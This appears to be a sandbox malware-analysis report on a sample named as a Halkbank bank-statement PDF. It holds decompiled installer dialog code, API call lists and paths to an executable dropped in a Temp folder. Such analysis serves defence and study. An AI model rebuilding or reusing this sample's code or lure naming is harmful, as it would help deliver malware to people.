                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				struct HWND__* _t94;
                                                                    				long _t95;
                                                                    				int _t100;
                                                                    				void* _t108;
                                                                    				intOrPtr _t130;
                                                                    				struct HWND__* _t134;
                                                                    				int _t156;
                                                                    				int _t159;
                                                                    				struct HMENU__* _t164;
                                                                    				struct HWND__* _t168;
                                                                    				struct HWND__* _t169;
                                                                    				int _t171;
                                                                    				void* _t172;
                                                                    				short* _t173;
                                                                    				short* _t175;
                                                                    				int _t177;
                                                                    
                                                                    				_t169 =  *0x429244;
                                                                    				_t156 = 0;
                                                                    				_v8 = _t169;
                                                                    				if(_a8 != 0x110) {
                                                                    					if(_a8 == 0x405) {
                                                                    						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                                    					}
                                                                    					if(_a8 != 0x111) {
                                                                    						L17:
                                                                    						_t171 = 1;
                                                                    						if(_a8 != 0x404) {
                                                                    							L25:
                                                                    							if(_a8 != 0x7b) {
                                                                    								goto L20;
                                                                    							}
                                                                    							_t94 = _v8;
                                                                    							if(_a12 != _t94) {
                                                                    								goto L20;
                                                                    							}
                                                                    							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                                    							_a8 = _t95;
                                                                    							if(_t95 <= _t156) {
                                                                    								L36:
                                                                    								return 0;
                                                                    							}
                                                                    							_t164 = CreatePopupMenu();
                                                                    							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                                    							_t100 = _a16;
                                                                    							_t159 = _a16 >> 0x10;
                                                                    							if(_a16 == 0xffffffff) {
                                                                    								GetWindowRect(_v8,  &_v28);
                                                                    								_t100 = _v28.left;
                                                                    								_t159 = _v28.top;
                                                                    							}
                                                                    							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                                    								_v60 = _t156;
                                                                    								_v48 = 0x423748;
                                                                    								_v44 = 0x1000;
                                                                    								_a4 = _a8;
                                                                    								do {
                                                                    									_a4 = _a4 - 1;
                                                                    									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                                    								} while (_a4 != _t156);
                                                                    								OpenClipboard(_t156);
                                                                    								EmptyClipboard();
                                                                    								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                                    								_a4 = _t108;
                                                                    								_t172 = GlobalLock(_t108);
                                                                    								do {
                                                                    									_v48 = _t172;
                                                                    									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                                    									 *_t173 = 0xd;
                                                                    									_t175 = _t173 + 2;
                                                                    									 *_t175 = 0xa;
                                                                    									_t172 = _t175 + 2;
                                                                    									_t156 = _t156 + 1;
                                                                    								} while (_t156 < _a8);
                                                                    								GlobalUnlock(_a4);
                                                                    								SetClipboardData(0xd, _a4);
                                                                    								CloseClipboard();
                                                                    							}
                                                                    							goto L36;
                                                                    						}
                                                                    						if( *0x42922c == _t156) {
                                                                    							ShowWindow( *0x42a268, 8);
                                                                    							if( *0x42a2ec == _t156) {
                                                                    								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
                                                                    							}
                                                                    							E0040459D(_t171);
                                                                    							goto L25;
                                                                    						}
                                                                    						 *0x421f18 = 2;
                                                                    						E0040459D(0x78);
                                                                    						goto L20;
                                                                    					} else {
                                                                    						if(_a12 != 0x403) {
                                                                    							L20:
                                                                    							return E0040462B(_a8, _a12, _a16);
                                                                    						}
                                                                    						ShowWindow( *0x429230, _t156);
                                                                    						ShowWindow(_t169, 8);
                                                                    						E004045F9(_t169);
                                                                    						goto L17;
                                                                    					}
                                                                    				}
                                                                    				_v52 = _v52 | 0xffffffff;
                                                                    				_v40 = _v40 | 0xffffffff;
                                                                    				_t177 = 2;
                                                                    				_v60 = _t177;
                                                                    				_v56 = 0;
                                                                    				_v48 = 0;
                                                                    				_v44 = 0;
                                                                    				asm("stosd");
                                                                    				asm("stosd");
                                                                    				_t130 =  *0x42a270;
                                                                    				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                                    				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                                    				 *0x429230 = GetDlgItem(_a4, 0x403);
                                                                    				 *0x429228 = GetDlgItem(_a4, 0x3ee);
                                                                    				_t134 = GetDlgItem(_a4, 0x3f8);
                                                                    				 *0x429244 = _t134;
                                                                    				_v8 = _t134;
                                                                    				E004045F9( *0x429230);
                                                                    				 *0x429234 = E00404F52(4);
                                                                    				 *0x42924c = 0;
                                                                    				GetClientRect(_v8,  &_v28);
                                                                    				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                                    				SendMessageW(_v8, 0x1061, 0,  &_v60);
                                                                    				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                                                                    				if(_a8 >= 0) {
                                                                    					SendMessageW(_v8, 0x1001, 0, _a8);
                                                                    					SendMessageW(_v8, 0x1026, 0, _a8);
                                                                    				}
                                                                    				if(_a12 >= _t156) {
                                                                    					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                                    				}
                                                                    				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                    				_push(0x1b);
                                                                    				E004045C4(_a4);
                                                                    				if(( *0x42a278 & 0x00000003) != 0) {
                                                                    					ShowWindow( *0x429230, _t156);
                                                                    					if(( *0x42a278 & 0x00000002) != 0) {
                                                                    						 *0x429230 = _t156;
                                                                    					} else {
                                                                    						ShowWindow(_v8, 8);
                                                                    					}
                                                                    					E004045F9( *0x429228);
                                                                    				}
                                                                    				_t168 = GetDlgItem(_a4, 0x3ec);
                                                                    				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                                    				if(( *0x42a278 & 0x00000004) != 0) {
                                                                    					SendMessageW(_t168, 0x409, _t156, _a12);
                                                                    					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                                    				}
                                                                    				goto L36;
                                                                    			}

































                                                                    0x00405811
                                                                    0x00405817
                                                                    0x00405821
                                                                    0x00405824
                                                                    0x004059ba
                                                                    0x004059de
                                                                    0x004059de
                                                                    0x004059f1
                                                                    0x00405a0f
                                                                    0x00405a11
                                                                    0x00405a19
                                                                    0x00405a6f
                                                                    0x00405a73
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405a75
                                                                    0x00405a7b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405a85
                                                                    0x00405a8d
                                                                    0x00405a90
                                                                    0x00405b92
                                                                    0x00000000
                                                                    0x00405b92
                                                                    0x00405a9f
                                                                    0x00405aaa
                                                                    0x00405ab3
                                                                    0x00405abe
                                                                    0x00405ac1
                                                                    0x00405aca
                                                                    0x00405ad0
                                                                    0x00405ad3
                                                                    0x00405ad3
                                                                    0x00405aeb
                                                                    0x00405af4
                                                                    0x00405af7
                                                                    0x00405afe
                                                                    0x00405b05
                                                                    0x00405b0d
                                                                    0x00405b0d
                                                                    0x00405b24
                                                                    0x00405b24
                                                                    0x00405b2b
                                                                    0x00405b31
                                                                    0x00405b3d
                                                                    0x00405b44
                                                                    0x00405b4d
                                                                    0x00405b4f
                                                                    0x00405b52
                                                                    0x00405b61
                                                                    0x00405b64
                                                                    0x00405b6a
                                                                    0x00405b6b
                                                                    0x00405b71
                                                                    0x00405b72
                                                                    0x00405b73
                                                                    0x00405b7b
                                                                    0x00405b86
                                                                    0x00405b8c
                                                                    0x00405b8c
                                                                    0x00000000
                                                                    0x00405aeb
                                                                    0x00405a21
                                                                    0x00405a51
                                                                    0x00405a59
                                                                    0x00405a64
                                                                    0x00405a64
                                                                    0x00405a6a
                                                                    0x00000000
                                                                    0x00405a6a
                                                                    0x00405a25
                                                                    0x00405a2f
                                                                    0x00000000
                                                                    0x004059f3
                                                                    0x004059f9
                                                                    0x00405a34
                                                                    0x00000000
                                                                    0x00405a3d
                                                                    0x00405a02
                                                                    0x00405a07
                                                                    0x00405a0a
                                                                    0x00000000
                                                                    0x00405a0a
                                                                    0x004059f1
                                                                    0x0040582a
                                                                    0x0040582e
                                                                    0x00405836
                                                                    0x0040583a
                                                                    0x0040583d
                                                                    0x00405840
                                                                    0x00405843
                                                                    0x00405846
                                                                    0x00405847
                                                                    0x00405848
                                                                    0x00405861
                                                                    0x00405864
                                                                    0x0040586e
                                                                    0x0040587d
                                                                    0x00405885
                                                                    0x0040588d
                                                                    0x00405892
                                                                    0x00405895
                                                                    0x004058a1
                                                                    0x004058aa
                                                                    0x004058b3
                                                                    0x004058d5
                                                                    0x004058db
                                                                    0x004058ec
                                                                    0x004058f1
                                                                    0x004058ff
                                                                    0x0040590d
                                                                    0x0040590d
                                                                    0x00405912
                                                                    0x00405920
                                                                    0x00405920
                                                                    0x00405925
                                                                    0x00405928
                                                                    0x0040592d
                                                                    0x00405939
                                                                    0x00405942
                                                                    0x0040594f
                                                                    0x0040595e
                                                                    0x00405951
                                                                    0x00405956
                                                                    0x00405956
                                                                    0x0040596a
                                                                    0x0040596a
                                                                    0x0040597e
                                                                    0x00405987
                                                                    0x00405990
                                                                    0x004059a0
                                                                    0x004059ac
                                                                    0x004059ac
                                                                    0x00000000

                                                                    APIs
                                                                    • GetDlgItem.USER32 ref: 00405867
                                                                    • GetDlgItem.USER32 ref: 00405876
                                                                    • GetClientRect.USER32 ref: 004058B3
                                                                    • GetSystemMetrics.USER32 ref: 004058BA
                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                                    • ShowWindow.USER32(?,00000008), ref: 00405956
                                                                    • GetDlgItem.USER32 ref: 00405977
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                                    • GetDlgItem.USER32 ref: 00405885
                                                                      • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                    • GetDlgItem.USER32 ref: 004059C9
                                                                    • CreateThread.KERNEL32 ref: 004059D7
                                                                    • CloseHandle.KERNEL32(00000000), ref: 004059DE
                                                                    • ShowWindow.USER32(00000000), ref: 00405A02
                                                                    • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                                    • ShowWindow.USER32(00000008), ref: 00405A51
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                                    • CreatePopupMenu.USER32 ref: 00405A96
                                                                    • AppendMenuW.USER32 ref: 00405AAA
                                                                    • GetWindowRect.USER32 ref: 00405ACA
                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                                    • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                                    • EmptyClipboard.USER32 ref: 00405B31
                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                                    • GlobalLock.KERNEL32 ref: 00405B47
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                                    • SetClipboardData.USER32 ref: 00405B86
                                                                    • CloseClipboard.USER32 ref: 00405B8C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                    • String ID: H7B${
                                                                    • API String ID: 590372296-2256286769
                                                                    • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                                    • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                                    • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                                                                    • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 78%
                                                                    			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                    				signed int _v8;
                                                                    				signed int _v12;
                                                                    				long _v16;
                                                                    				long _v20;
                                                                    				long _v24;
                                                                    				char _v28;
                                                                    				intOrPtr _v32;
                                                                    				long _v36;
                                                                    				char _v40;
                                                                    				unsigned int _v44;
                                                                    				signed int _v48;
                                                                    				WCHAR* _v56;
                                                                    				intOrPtr _v60;
                                                                    				intOrPtr _v64;
                                                                    				intOrPtr _v68;
                                                                    				WCHAR* _v72;
                                                                    				void _v76;
                                                                    				struct HWND__* _v80;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				intOrPtr _t82;
                                                                    				long _t87;
                                                                    				short* _t89;
                                                                    				void* _t95;
                                                                    				signed int _t96;
                                                                    				int _t109;
                                                                    				signed short _t114;
                                                                    				signed int _t118;
                                                                    				struct HWND__** _t122;
                                                                    				intOrPtr* _t138;
                                                                    				WCHAR* _t146;
                                                                    				unsigned int _t150;
                                                                    				signed int _t152;
                                                                    				unsigned int _t156;
                                                                    				signed int _t158;
                                                                    				signed int* _t159;
                                                                    				signed int* _t160;
                                                                    				struct HWND__* _t166;
                                                                    				struct HWND__* _t167;
                                                                    				int _t169;
                                                                    				unsigned int _t197;
                                                                    
                                                                    				_t156 = __edx;
                                                                    				_t82 =  *0x422720;
                                                                    				_v32 = _t82;
                                                                    				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
                                                                    				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                    				if(_a8 == 0x40b) {
                                                                    					E00405CAC(0x3fb, _t146);
                                                                    					E004068EF(_t146);
                                                                    				}
                                                                    				_t167 = _a4;
                                                                    				if(_a8 != 0x110) {
                                                                    					L8:
                                                                    					if(_a8 != 0x111) {
                                                                    						L20:
                                                                    						if(_a8 == 0x40f) {
                                                                    							L22:
                                                                    							_v8 = _v8 & 0x00000000;
                                                                    							_v12 = _v12 & 0x00000000;
                                                                    							E00405CAC(0x3fb, _t146);
                                                                    							if(E0040603F(_t186, _t146) == 0) {
                                                                    								_v8 = 1;
                                                                    							}
                                                                    							E00406668(0x421718, _t146);
                                                                    							_t87 = E00406A35(1);
                                                                    							_v16 = _t87;
                                                                    							if(_t87 == 0) {
                                                                    								L30:
                                                                    								E00406668(0x421718, _t146);
                                                                    								_t89 = E00405FE2(0x421718);
                                                                    								_t158 = 0;
                                                                    								if(_t89 != 0) {
                                                                    									 *_t89 = 0;
                                                                    								}
                                                                    								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                    									goto L35;
                                                                    								} else {
                                                                    									_t169 = 0x400;
                                                                    									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                    									asm("cdq");
                                                                    									_v48 = _t109;
                                                                    									_v44 = _t156;
                                                                    									_v12 = 1;
                                                                    									goto L36;
                                                                    								}
                                                                    							} else {
                                                                    								_t159 = 0;
                                                                    								if(0 == 0x421718) {
                                                                    									goto L30;
                                                                    								} else {
                                                                    									goto L26;
                                                                    								}
                                                                    								while(1) {
                                                                    									L26:
                                                                    									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
                                                                    									if(_t114 != 0) {
                                                                    										break;
                                                                    									}
                                                                    									if(_t159 != 0) {
                                                                    										 *_t159 =  *_t159 & _t114;
                                                                    									}
                                                                    									_t160 = E00405F83(0x421718);
                                                                    									 *_t160 =  *_t160 & 0x00000000;
                                                                    									_t159 = _t160;
                                                                    									 *_t159 = 0x5c;
                                                                    									if(_t159 != 0x421718) {
                                                                    										continue;
                                                                    									} else {
                                                                    										goto L30;
                                                                    									}
                                                                    								}
                                                                    								_t150 = _v44;
                                                                    								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                    								_v44 = _t150 >> 0xa;
                                                                    								_v12 = 1;
                                                                    								_t158 = 0;
                                                                    								__eflags = 0;
                                                                    								L35:
                                                                    								_t169 = 0x400;
                                                                    								L36:
                                                                    								_t95 = E00404F52(5);
                                                                    								if(_v12 != _t158) {
                                                                    									_t197 = _v44;
                                                                    									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                    										_v8 = 2;
                                                                    									}
                                                                    								}
                                                                    								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
                                                                    									E00404F3A(0x3ff, 0xfffffffb, _t95);
                                                                    									if(_v12 == _t158) {
                                                                    										SetDlgItemTextW(_a4, _t169, 0x421708);
                                                                    									} else {
                                                                    										E00404E71(_t169, 0xfffffffc, _v48, _v44);
                                                                    									}
                                                                    								}
                                                                    								_t96 = _v8;
                                                                    								 *0x42a304 = _t96;
                                                                    								if(_t96 == _t158) {
                                                                    									_v8 = E0040140B(7);
                                                                    								}
                                                                    								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                                    									_v8 = _t158;
                                                                    								}
                                                                    								E004045E6(0 | _v8 == _t158);
                                                                    								if(_v8 == _t158 &&  *0x423738 == _t158) {
                                                                    									E00404A0E();
                                                                    								}
                                                                    								 *0x423738 = _t158;
                                                                    								goto L53;
                                                                    							}
                                                                    						}
                                                                    						_t186 = _a8 - 0x405;
                                                                    						if(_a8 != 0x405) {
                                                                    							goto L53;
                                                                    						}
                                                                    						goto L22;
                                                                    					}
                                                                    					_t118 = _a12 & 0x0000ffff;
                                                                    					if(_t118 != 0x3fb) {
                                                                    						L12:
                                                                    						if(_t118 == 0x3e9) {
                                                                    							_t152 = 7;
                                                                    							memset( &_v76, 0, _t152 << 2);
                                                                    							_v80 = _t167;
                                                                    							_v72 = 0x423748;
                                                                    							_v60 = E00404E0B;
                                                                    							_v56 = _t146;
                                                                    							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
                                                                    							_t122 =  &_v80;
                                                                    							_v64 = 0x41;
                                                                    							__imp__SHBrowseForFolderW(_t122);
                                                                    							if(_t122 == 0) {
                                                                    								_a8 = 0x40f;
                                                                    							} else {
                                                                    								__imp__CoTaskMemFree(_t122);
                                                                    								E00405F37(_t146);
                                                                    								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
                                                                    								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\alfons\\AppData\\Local\\Temp") {
                                                                    									E004066A5(_t146, 0x423748, _t167, 0, _t125);
                                                                    									if(lstrcmpiW(0x428200, 0x423748) != 0) {
                                                                    										lstrcatW(_t146, 0x428200);
                                                                    									}
                                                                    								}
                                                                    								 *0x423738 =  *0x423738 + 1;
                                                                    								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                                    							}
                                                                    						}
                                                                    						goto L20;
                                                                    					}
                                                                    					if(_a12 >> 0x10 != 0x300) {
                                                                    						goto L53;
                                                                    					}
                                                                    					_a8 = 0x40f;
                                                                    					goto L12;
                                                                    				} else {
                                                                    					_t166 = GetDlgItem(_t167, 0x3fb);
                                                                    					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
                                                                    						E00405F37(_t146);
                                                                    					}
                                                                    					 *0x429238 = _t167;
                                                                    					SetWindowTextW(_t166, _t146);
                                                                    					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                    					_push(1);
                                                                    					E004045C4(_t167);
                                                                    					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                    					_push(0x14);
                                                                    					E004045C4(_t167);
                                                                    					E004045F9(_t166);
                                                                    					_t138 = E00406A35(8);
                                                                    					if(_t138 == 0) {
                                                                    						L53:
                                                                    						return E0040462B(_a8, _a12, _a16);
                                                                    					} else {
                                                                    						 *_t138(_t166, 1);
                                                                    						goto L8;
                                                                    					}
                                                                    				}
                                                                    			}













































                                                                    0x00404ab5
                                                                    0x00404abb
                                                                    0x00404ac1
                                                                    0x00404ace
                                                                    0x00404adc
                                                                    0x00404adf
                                                                    0x00404ae7
                                                                    0x00404aed
                                                                    0x00404aed
                                                                    0x00404af9
                                                                    0x00404afc
                                                                    0x00404b6a
                                                                    0x00404b71
                                                                    0x00404c48
                                                                    0x00404c4f
                                                                    0x00404c5e
                                                                    0x00404c5e
                                                                    0x00404c62
                                                                    0x00404c6c
                                                                    0x00404c79
                                                                    0x00404c7b
                                                                    0x00404c7b
                                                                    0x00404c89
                                                                    0x00404c90
                                                                    0x00404c97
                                                                    0x00404c9a
                                                                    0x00404cd6
                                                                    0x00404cd8
                                                                    0x00404cde
                                                                    0x00404ce3
                                                                    0x00404ce7
                                                                    0x00404ce9
                                                                    0x00404ce9
                                                                    0x00404d05
                                                                    0x00000000
                                                                    0x00404d07
                                                                    0x00404d0a
                                                                    0x00404d18
                                                                    0x00404d1e
                                                                    0x00404d1f
                                                                    0x00404d22
                                                                    0x00404d25
                                                                    0x00000000
                                                                    0x00404d25
                                                                    0x00404c9c
                                                                    0x00404c9e
                                                                    0x00404ca2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404ca4
                                                                    0x00404ca4
                                                                    0x00404cb1
                                                                    0x00404cb6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404cba
                                                                    0x00404cbc
                                                                    0x00404cbc
                                                                    0x00404cc5
                                                                    0x00404cc7
                                                                    0x00404ccc
                                                                    0x00404ccf
                                                                    0x00404cd4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404cd4
                                                                    0x00404d31
                                                                    0x00404d3b
                                                                    0x00404d3e
                                                                    0x00404d41
                                                                    0x00404d48
                                                                    0x00404d48
                                                                    0x00404d4a
                                                                    0x00404d4a
                                                                    0x00404d4f
                                                                    0x00404d51
                                                                    0x00404d59
                                                                    0x00404d60
                                                                    0x00404d62
                                                                    0x00404d6d
                                                                    0x00404d6d
                                                                    0x00404d62
                                                                    0x00404d7d
                                                                    0x00404d87
                                                                    0x00404d8f
                                                                    0x00404daa
                                                                    0x00404d91
                                                                    0x00404d9a
                                                                    0x00404d9a
                                                                    0x00404d8f
                                                                    0x00404daf
                                                                    0x00404db4
                                                                    0x00404db9
                                                                    0x00404dc2
                                                                    0x00404dc2
                                                                    0x00404dcb
                                                                    0x00404dcd
                                                                    0x00404dcd
                                                                    0x00404dd9
                                                                    0x00404de1
                                                                    0x00404deb
                                                                    0x00404deb
                                                                    0x00404df0
                                                                    0x00000000
                                                                    0x00404df0
                                                                    0x00404c9a
                                                                    0x00404c51
                                                                    0x00404c58
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404c58
                                                                    0x00404b77
                                                                    0x00404b80
                                                                    0x00404b9a
                                                                    0x00404b9f
                                                                    0x00404ba9
                                                                    0x00404bb0
                                                                    0x00404bbc
                                                                    0x00404bbf
                                                                    0x00404bc2
                                                                    0x00404bc9
                                                                    0x00404bd1
                                                                    0x00404bd4
                                                                    0x00404bd8
                                                                    0x00404bdf
                                                                    0x00404be7
                                                                    0x00404c41
                                                                    0x00404be9
                                                                    0x00404bea
                                                                    0x00404bf1
                                                                    0x00404bfb
                                                                    0x00404c03
                                                                    0x00404c10
                                                                    0x00404c24
                                                                    0x00404c28
                                                                    0x00404c28
                                                                    0x00404c24
                                                                    0x00404c2d
                                                                    0x00404c3a
                                                                    0x00404c3a
                                                                    0x00404be7
                                                                    0x00000000
                                                                    0x00404b9f
                                                                    0x00404b8d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404b93
                                                                    0x00000000
                                                                    0x00404afe
                                                                    0x00404b0b
                                                                    0x00404b14
                                                                    0x00404b21
                                                                    0x00404b21
                                                                    0x00404b28
                                                                    0x00404b2e
                                                                    0x00404b37
                                                                    0x00404b3a
                                                                    0x00404b3d
                                                                    0x00404b45
                                                                    0x00404b48
                                                                    0x00404b4b
                                                                    0x00404b51
                                                                    0x00404b58
                                                                    0x00404b5f
                                                                    0x00404df6
                                                                    0x00404e08
                                                                    0x00404b65
                                                                    0x00404b68
                                                                    0x00000000
                                                                    0x00404b68
                                                                    0x00404b5f

                                                                    APIs
                                                                    • GetDlgItem.USER32 ref: 00404B04
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                                    • lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj,00423748,00000000,?,?), ref: 00404C1C
                                                                    • lstrcatW.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj), ref: 00404C28
                                                                    • SetDlgItemTextW.USER32 ref: 00404C3A
                                                                      • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                                                                      • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                      • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                      • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                      • Part of subcall function 004068EF: CharPrevW.USER32(?,?,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                    • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                                      • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                      • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                                      • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
